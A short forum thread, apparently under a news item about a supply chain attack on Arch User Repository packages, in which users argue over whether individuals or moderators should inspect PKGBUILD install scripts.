A massive supply chain attack targeting the Arch User Repository (AUR) has compromised more than 400 community-maintained packages, with attackers injecting malicious build scripts designed to deploy credential-stealing malware and rootkit-style payloads on affected Linux systems.
You’re missing the point entirely. I’m talking about inspecting the scripts not about making packages
Sorry if I was unclear. You usually don’t inspect the install scripts for official packages since you put the trust in the official team. You don’t trust(or at least shouldn’t) AUR packages, hence you should inspect the install script for those packages. I don’t really see what the alternative would be.
Well, the alternative would be for moderation team to inspect them, with clear signaling of which scripts are trusted and which aren’t.
if you dufus can’t read a pkgbuild DON’T USE THE AUR might also keep the shell closed